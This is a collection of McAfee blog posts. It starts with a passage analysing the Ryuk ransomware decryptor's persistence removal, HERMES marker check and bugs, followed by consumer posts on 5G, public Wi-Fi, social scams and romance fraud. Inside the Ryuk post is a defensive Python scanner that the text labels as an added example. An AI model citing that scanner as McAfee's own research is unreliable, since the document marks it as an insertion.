Even though the average ransom discounts for Ryuk are large (~60%), the absolute level of the ransom is extreme. Accordingly, we have seen evidence that links ransom demands to the size of the victim company's network footprint. However, this doesn't mean that the ransom demand correlates with the victim's actual operational and financial size.

Companies in the IT Hosting and the Freight and Logistics industries have been particularly susceptible to this discrepancy. Coveware has assisted at least 3 companies that have had to unwind their business when an affordable ransom amount could not be reached. Typically, downtime costs are 10x the ransom amount, but in these industries downtime costs can be particularly extreme.

IT Hosting companies are of note because the size and number of their servers can make them appear like a large organization. Unfortunately, the business of hosting involves high fixed costs, low operating margins, and zero tolerance of downtime by end clients. Hosting companies that get attacked typically have a few hours to restore service before their clients drop them for alternatives. Moreover, these companies suffer irreparable harm to their reputations, and may trigger SLA breaches that leave them exposed to liability. The inability to pay a six-figure ransom has caused multiple hosting companies to shut down.

Freight and Logistics firms are also acutely exposed. These firms also present like larger firms given the volume of data they move and their network footprint. Additionally, attacks against Freight and Logistics firms can cause immediate supply chain issues for the victims’ end clients, who are subsequently forced to route through other service providers. Similar to IT Hosting, Freight and Logistics firms have low operating margins and end clients with little tolerance for service interruptions. The inability to pay or negotiate a large ransom has materially impacted several firms in this industry.

Ryuk Decryptor findings and issues

When victims do pay the exorbitant ransom amount, the criminals provide a decryptor to unlock their files. This decryptor is actually a framework that must be loaded with the victim’s private RSA key, provided by the criminals, before it can decrypt anything, which ensures that the provided decryptor only works for this specific victim. This setup allows the criminals to quickly load a victim’s key into the framework and offer a custom decryptor with minimal code change, while the underlying framework remains the same.

From Coveware’s experience we have learned that the decryption process is quite cumbersome and full of possible fatal errors. Luckily Coveware was able to share the Ryuk decryptor with McAfee ATR in order to take a closer look at the issues and level of sophistication of the decryptor.

Once launched, the first thing the decryptor does is search the HKEY_CURRENT_USER hive for a value named “svchos” under the path “SOFTWARE\Microsoft\Windows\CurrentVersion\Run” and delete that entry. This removes the malware’s persistence. Afterwards it reboots the system and removes any remaining Ryuk malware still residing on the system.

Deleting the “svchos” value from the registry.

Once rebooted the user needs to run the tool again and the decryptor will provide two options to decrypt.

  • Decryption per file
  • Automatic decryption

The main interface of the Ryuk decryptor with the different menu options.

HERMES File Marker

During the decryption process we have found that the decryptor searches for the known file marker string HERMES which is located in the encrypted file.

The HERMES marker clearly visible within the file

That Ryuk ransomware adds the HERMES file marker string was already known, but discovering this specific check routine in the decryptor strengthens even further the hypothesis that Ryuk is a slightly modified version of the Hermes2.1 ransomware kit that is sold online.

Decryptor Issues

While examining the decryptor we were astonished by the lack of sophistication and the amount of errors that resided within the code. Some of the most prominent issues were:

  • If there is a space in the Windows file path, the decryptor will fail the decryption process.
  • If there is a quotation mark (“) in the file path, the decryptor will report an error that it cannot find the specified file.
  • The decryptor uses the “GetVersionExW” function to determine the Windows version; from Windows 8.1 onward the value returned by this API has changed, and the decryptor isn’t designed to handle the new value.
  • The decryptor doesn’t remove the .RYUK extension and replace it with the original extension, so the file name gives no indication of the file type, which can make recovery extremely labor intensive for enterprise victims.
  • When choosing the manual option in the decryptor, the user has to supply the path of a specific file or choose “0” to finish. However, choosing “0” puts the decryptor into an infinite loop.

Looking at the decryptor, it is very worrisome to see that the criminals behind Ryuk can get away with such bad programming. It shows a clear lack of empathy towards their victims and the absence of solid coding skills. Victims who do pay the exorbitant ransom demand are far from in the clear. The decryptor offered by the criminals has a very high risk of malfunctioning, resulting in permanent damage to their precious files. Victims should always make an exact copy of the encrypted hard disk before trying to use the decryptor.
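Before a victim runs the criminals’ decryptor, a defender wants an inventory of what it will be asked to handle. The Python triage scanner below is an added example and not McAfee ATR’s or Coveware’s code: it walks a directory, flags files carrying the HERMES marker the decryptor looks for (searched anywhere in the file, since the post only says the marker sits inside the encrypted file), records the original extension hidden behind .RYUK that the decryptor never restores, and flags paths with spaces or quotation marks that trip the decryptor up. The files it scans are constructed stand-ins, not real Ryuk output.

```python
import os
import tempfile
from dataclasses import dataclass
from typing import List

HERMES_MARKER = b"HERMES"  # file marker the decryptor checks for
RYUK_EXT = ".RYUK"         # extension the decryptor leaves in place


def file_has_marker(path: str, marker: bytes = HERMES_MARKER,
                    chunk_size: int = 1 << 20) -> bool:
    """True if `marker` occurs anywhere in the file (read in chunks, with an
    overlap of len(marker)-1 bytes so a marker split across chunks is found)."""
    keep = len(marker) - 1
    tail = b""
    with open(path, "rb") as fh:
        while True:
            block = fh.read(chunk_size)
            if not block:
                return False
            buf = tail + block
            if marker in buf:
                return True
            tail = buf[-keep:] if keep else b""


@dataclass
class EncryptedFile:
    rel_path: str       # path relative to the scanned root
    original_ext: str   # extension hidden behind .RYUK, e.g. ".docx"
    marker_found: bool  # HERMES marker present, as the decryptor expects
    problem_path: bool  # contains a space or quotation mark (decryptor bugs)


def original_extension(name: str) -> str:
    """'annual report.docx.RYUK' -> '.docx'; anything without .RYUK -> ''."""
    if not name.upper().endswith(RYUK_EXT):
        return ""
    return os.path.splitext(name[:-len(RYUK_EXT)])[1]


def scan_tree(root: str) -> List[EncryptedFile]:
    """Inventory every file under `root` that looks Ryuk-encrypted."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            has_ext = name.upper().endswith(RYUK_EXT)
            has_marker = file_has_marker(path)
            if not (has_ext or has_marker):
                continue  # untouched file, nothing to record
            rel = os.path.relpath(path, root)
            found.append(EncryptedFile(rel, original_extension(name), has_marker,
                                       " " in rel or '"' in rel))
    return sorted(found, key=lambda f: f.rel_path)


def build_constructed_sample(root: str) -> None:
    """Write constructed stand-ins (not real Ryuk output) for a demo run."""
    filler = bytes(range(256)) * 4
    footer = HERMES_MARKER + b"\x00" * 32          # marker plus dummy key blob
    samples = {
        "Q4 reports/annual report.docx.RYUK": filler + footer,   # spaces in path
        "invoice.pdf.RYUK": filler + footer,
        "big.mp4.RYUK": b"\x00" * ((1 << 20) - 3) + footer,      # marker straddles a chunk
        "partial.jpg.RYUK": filler[:100],                        # truncated, no marker
        "readme.txt": b"plain text, never encrypted\n",
    }
    for rel, data in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def demo_scan() -> List[EncryptedFile]:
    """Build the constructed sample in a scratch directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_constructed_sample(root)
        return scan_tree(root)


if __name__ == "__main__":
    for entry in demo_scan():
        print(entry)
```

Files flagged with `marker_found=False` or `problem_path=True` are the ones to set aside and examine on the disk copy before the decryptor is ever pointed at them.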

Call to action in piecing the different parts together

By combining all the fresh insights with the information that was already discovered by ourselves and industry peers, we can start defining our leading hypothesis around Ryuk. Based on this hypothesis, we will actively look for falsifying evidence. We encourage the security community to participate in this process. We realize that only by collaboration can we piece the different parts of the Ryuk puzzle together.

By now it should be without question that involvement of the DPRK is the least likely hypothesis. Our leading hypothesis on Ryuk, until proven otherwise, is:

  • Ryuk is a direct descendant of Hermes2.1 with slight modifications, based on the code overlap in the ransomware as well as the decryptor.
  • Ryuk is not designed to be used in a large-scale corporate environment, based on all the scalability issues in the decryptor.
  • At this moment there are several actors or actor-groups spreading Ryuk, based on the extortion modus operandi and the different communications with the victims.
  • The actors or actor-groups behind Ryuk have a relationship with one of the post-Soviet republics, based on the Russian found in one of the encrypted files and the cultural references observed in the negotiations.
  • The actors behind Ryuk most likely have an affiliation or relationship with the actors behind Trickbot and, based on their TTPs, are better skilled at exploitation and lateral movement than at pure ransomware development.

Conclusion

In the last seven months Ryuk has proven to be a highly profitable form of ransomware, despite the poor programming behind it and its decryptor. The criminals have proven to be ruthless and several of their victims were forced to wind down their businesses after they were unable to afford the exorbitant ransom.

When a company does give in to the high demands it is extra painful to see a situation occur where they are permanently unable to recover their files due to the faulty decryptor.

A solid data loss prevention strategy still remains the best advice against all forms of ransomware; for general prevention advice please visit NoMoreRansom. Always seek professional assistance when you are faced with a targeted ransomware attack such as Ryuk.

The post Ryuk, Exploring the Human Connection appeared first on McAfee Blogs.

MWC 2019: The Key to Establishing Digital Trust with Intelligent Connectivity

These days, it’s rare to walk into a home that doesn’t have a smart device in use. From voice assistants, smart TVs, tablets, and more, these devices have greatly enhanced our way of life through intelligent connectivity. Intelligent connectivity is defined by the highly contextualized and personal experiences offered by the smart devices we utilize on a daily basis. However, as manufacturers continue to push out the latest technology to stay ahead of their competitors, device security isn’t always top-of-mind. As a result, the level of confidence consumers have in their devices is reduced. At McAfee, we understand that the notion of digital trust is imperative to the future of security as we adopt technologies shaped by the likes of 5G networks, the Internet of Things (IoT), artificial intelligence (AI), and big data. And as we head into Mobile World Congress 2019 (MWC), one can’t help but wonder, how will these advancements shape the future of mobile connectivity?

Almost every new device is built to connect, and as our 2019 Threats Predictions Report showed us, our dependence on technology is ubiquitous. Take your smartphone, for example. Everywhere you go, this minicomputer allows you to chat with your friends online, send emails, and look up new information with just the press of a button. Only upping the ante, 5G is set to roll out across the nation, bringing greater speed to handheld devices with more data and lower latency. These benefits will set the stage for more IoT devices, such as your smart refrigerator or smart plug, to connect to the network as well. The ability to control the temperature of your refrigerator from your smartphone is a pretty cool capability. But what happens if your smartphone gets hacked and a cybercriminal remotely disables your refrigerator? You may be left with a bigger problem than some spoiled food.

With all of your smart devices on the same 5G network, malicious actors can gain full access to the data that lives in your smart home technology through just your mobile phone. The increase in devices on the 5G network also increases the risk of Distributed Denial-of-Service (DDoS) attacks. These attacks are caused by cybercriminals flooding a network with so much traffic that it can’t operate or communicate as it normally would. And with more IoT devices operating on the 5G network, the consequences of such a cyberattack could be truly crippling. So, how can we continue to trust the devices we use on a daily basis despite the cybersecurity risks caused by greater connectivity?

Digital trust, or the level of confidence consumers have in their technology and mobile devices, is extremely delicate. And as our experiences with our devices become more and more personalized thanks to intelligent connectivity, it’s important to realize that it can’t be intelligent if there is no trust. That’s why consumers should embrace advancements in mobile technology but remember to keep cybersecurity practices at the forefront.

Whether you’re headed out to Barcelona for MWC 2019 or watching from afar, we here at McAfee are committed to helping you take the necessary precautions required in order to connect with confidence in a world where everything is built to connect.

Stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listening to our podcast Hackable?, and ‘liking’ us on Facebook.

The post MWC 2019: The Key to Establishing Digital Trust with Intelligent Connectivity appeared first on McAfee Blogs.

The Risks of Public Wi-Fi and How to Close the Security Gap

As I write this blog post, I’m digitally exposed, and I know it. For the past week, I’ve had to log on to a hospital’s public Wi-Fi each day to work while a loved one recuperates.

What seems like a routine, casual connection to the hospital’s Wi-Fi isn’t. Using public Wi-Fi is a daily choice loaded with risk. Sure, I’m conducting business and knocking out my to-do list like a rock star but at what cost to my security?

The Risks

By using public Wi-Fi, I’ve opened my online activity and personal data (via my laptop) up to a variety of threats including eavesdropping, malware distribution, and bitcoin mining. There’s even a chance I could have logged on to a malicious hotspot that looked like the hospital network.

Like many public Wi-Fi spots, the hospital’s network could lack encryption, which is a security measure that scrambles the information sent from my computer to the hospital’s router so other people can’t read it. Minus encryption, whatever I send over the hospital’s network could potentially be intercepted and used maliciously by cybercriminals.

Because logging on to public Wi-Fi is often a necessity — like my situation this week — security isn’t always the first thing on our minds. But over the past year, a new normal is emerging. A lot of us are thinking twice. With data breaches, privacy concerns, the increase in the market for stolen credentials, and increasingly sophisticated online scams making the headlines every day, the risks of using public Wi-Fi are front and center.

Rising Star: VPN

The solution to risky public Wi-Fi? A Virtual Private Network (VPN). A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your online activity by encrypting your data when you connect to the internet from a remote or public location. A VPN also conceals your location, IP address, and online activity.

Using a VPN helps protect you from potential hackers using public Wi-Fi, which is one of their favorite easy-to-access security loopholes.

Who Needs a VPN?

If you (or your family members) travel and love to shop online, access your bank account, watch movies, and do everyday business via your phone or laptop, a VPN would allow you to connect safely and encrypt your data no matter where you are.

A VPN can mask, or scramble, your physical location, banking account credentials, and credit card information.

Also, if you have a family data plan you’ve likely encouraged your kids to save data by connecting to public Wi-Fi whenever possible. Using a VPN, this habit would be secured from criminal sniffers and snoopers.

A VPN allows you to connect to a proxy server that accesses online sites on your behalf and enables a secure connection almost anywhere you go. A VPN also hides your IP address and lets you browse anonymously from any location.

How VPNs work

To use a VPN, you subscribe to a VPN service, download the app onto your desktop or phone, set up your account, and then log on to a VPN server to conduct your online activity privately.

If you are still logging on to public Wi-Fi, here are a few tips to keep you safe until VPNs become as popular as Wi-Fi.

Stay Safe on Public Wi-Fi 

Verify your connection. Fake networks that mine your data abound. If you are logging on to Wi-Fi in a coffee shop, hotel, airport, or library, verify the exact name of the network with an employee. Also, only use Wi-Fi that requires a password to log on.

Don’t get distracted. For adults, as well as kids, it’s easy to get distracted and absorbed with our screens — this is risky when on public Wi-Fi, according to Diana Graber, author of Raising Humans in a Digital World. “Knowing how to guard their personal information online is one of the most important skills parents need to equip their young kids with today,” says Graber. “Lots of young people visit public spaces, like a local coffee shop or library, and use public Wi-Fi to do homework, for example. It’s not uncommon for them to get distracted by something else online or even tempted to buy something, without realizing their personal information (or yours!) might be at risk.”

Disable auto Wi-Fi connect. If your phone automatically joins surrounding networks, you can disable this function in your settings. Avoid linking to unknown or unrecognized networks.

Turn off Wi-Fi when done. Your computer or phone can still transmit data even when you are not using it. Be sure to disconnect from the network and turn off your Wi-Fi when you are finished using it.

Avoid financial transactions. If you must use public Wi-Fi, don’t conduct a sensitive transaction such as banking, shopping, or any kind of activity that requires your social security or credit card numbers or password use. Wait until you get to a secured home network to conduct personal business.

Look for the HTTPS. Fake or unsecured websites will not have the HTTPS in their address. Also, look for the little lock icon in the address bar to confirm a secure connection.

Secure your devices. Use a personal VPN as an extra layer of security against hackers and malware.

The post The Risks of Public Wi-Fi and How to Close the Security Gap appeared first on McAfee Blogs.

How To Sidestep Popular Social Scams

Each year, internet users lose billions of dollars to online scams that use clever ploys to trick us out of our information and money. By offering prizes, referencing current events, or just creating a sense of urgency, scammers know how to get us to click when we really shouldn’t. Check out these recent scams, so you know what to look out for.

Nosy Quizzes & Questionnaires

Quizzes circulating on Facebook, Twitter, and other social platforms may look like a fun way to win free stuff, but often they are phishing attacks in disguise. Many appear to be sponsored by big-name brands such as airlines and major retailers, offering free products or discount tickets if you just answer a few questions. The questions are designed to get you to reveal personal information that can be used to guess your passwords or security questions, such as your mother’s maiden name, or your hometown.

Creepy Crypto Scams 

While cryptocurrencies lost a lot of value over the last year, the same cannot be said for cryptocurrency scams. The majority of them center on distributing crypto mining malware, which allows hackers to access a person’s computer or device without their permission in order to mine for cryptocurrencies. In fact, these scams have been so prolific that at the end of 2018 McAfee reported that coin mining malware had grown more than 4000% in the previous year.

Many of these miners were distributed through phishing emails and websites, using “giveaway” scams on social media, or even via crypto mining chat groups on platforms such as Slack. Cybercrooks enter the chat rooms, pretending to be fellow miners, and encourage users to download malware disguised as “fixes” to crypto issues.

Romance & “Sextortion” Scams 

The meteoric rise of online dating has led to a similar increase in romance scams. These often involve bad actors preying on lonely people who are looking to connect. Scammers build up a sense of trust over online dating and social media platforms, before asking for money. They often claim the money is for an emergency, or a plane ticket to visit. This kind of manipulation works so well that the Better Business Bureau estimates that victims in the U.S. and Canada lost nearly $1 billion to romance scams between 2015 and 2018.

And while romance is one way to manipulate users, another driver is fear. This is certainly the case with the recent rise in so-called “sextortion” scams, which scare users into paying money to prevent incriminating pictures or videos of them from getting out. The bad guys claim that they obtained the embarrassing content by infecting the victim’s device with malware, and often send part of an old, leaked password as proof that they could have accessed their account.

Topical News Hooks

Whenever a major story sweeps the news, chances are the scammers are looking for ways to capitalize on it. This is exactly what happened during the recent U.S. government shutdown, which left 800,000 federal employees out of work for over a month. Since many of these workers were looking for extra income, job scams abounded. Some phony job ads asked workers to fill out detailed job application forms, in order to steal their Social Security numbers and other private information.

In another ruse, scammers sent out phony emails that appeared to be from the IRS, saying that the recipient could get a discount on their tax bills if they paid during the shutdown.

Tried-and-True Scams

Package Delivery— Phony package delivery emails usually spike around the holidays, but in the age of Amazon Prime, delivery scams are circulating year-round. Be on the lookout for more recent Amazon scams that come in the form of a phishing email asking you to review a product to get rewards. If you click on the link it could deliver malware, or even ransomware.

Tech Support— This is one of the oldest, but most persistent scams to date. Phishing websites and phony pop-up warnings that a computer or device is infected have led thousands of people to hand over personal and financial information to fix a problem they don’t really have.

Even though consumers have become savvier about these scams, a recent Microsoft survey found that 3 out of 5 people have been exposed to tech support scams over the last year.

So, now that you know what to look out for, here are our top tips for sidestepping the scammers:

  • Be careful where you click—Don’t open suspicious links and attachments, and never click on pop-up messages from an unknown source. If you get a suspicious login or payment request, go directly to the provider’s official website to see if the request is legitimate.
  • Know how to spot the fake—Phony messages or documents will often look like a simplified version of the real thing, with poor quality graphics, incorrect grammar and spelling, and a generic personal greeting.
  • Keep your personal information private—Avoid online quizzes, and never share personal or financial details with someone you don’t know in real life. Review your privacy and security settings on social sites to make sure that you aren’t leaking information.
  • Be a smart online shopper—Only buy from reputable websites, and steer away from deals that seem too good to be true. Be suspicious of unusual payment requests, such as buying gift cards or using virtual currency.
  • Become a password pro—Choose complex and unique passwords for all of your accounts. Consider using a password manager to help you create and store complicated passwords securely.
  • Protect your computers and devices—Use comprehensive security software that can safeguard you from the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post How To Sidestep Popular Social Scams appeared first on McAfee Blogs.

Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account

It’s hard to believe that as savvy as we’ve become about our tech, people are still getting catfished, scammed, and heartbroken in their pursuit of love online.

The dinner conversation between bystanders goes something like this: “How could anyone be so dumb? Seriously? If they are going to be that reckless and uninformed, then maybe they deserve what they got!”

Some friends and I recently had a similar conversation about online dating scams. I noticed, however, that one friend, Sarah*, wasn’t so eager to jump into the conversation. She shrunk back in the booth and quietly sipped her margarita. Only later did she share her story with me.

The power of love

Sarah, a single mom in her late 40s, well-educated and attractive, had been convinced by her teenager to join a dating site the year before. She was especially lonely after her divorce three years earlier, so she agreed to create a profile on a popular dating app. After a handful of dates fell flat, she found Scott. He was charismatic, kind. “We had an instant connection,” according to Sarah. They spent hours on the phone sharing their deepest secrets and even started imagining a future together. But after about three months, Scott fell on hard times. At first, he needed to borrow $400 to pay for airfare to visit a dying relative, which he paid back immediately. Over the next few months, the numbers grew to $1,000 for rent and $3,000 for a business venture.


Before long, Sarah had loaned her new love over $8,500. When she pressed him to repay the money, Scott ghosted Sarah online, moved out of town, and she never saw him again. My friend didn’t share her story with many people. She didn’t report it. She was too embarrassed and humiliated and even became depressed following what she calls “the Scott scam.” Her trust in other people and in love itself has been obliterated.

Sarah’s story doesn’t just echo that of desperate, clueless people, or lonely older women. Scammers are targeting good people who still believe in and value love and companionship. The pursuit of love online extends to adults as well as teens.

Confidence Fraud

Law enforcement calls these kinds of online romance scams confidence fraud because scammers will take a considerable amount of time gaining the trust and confidence of their victims. They will appear empathetic and supportive as they gather personal i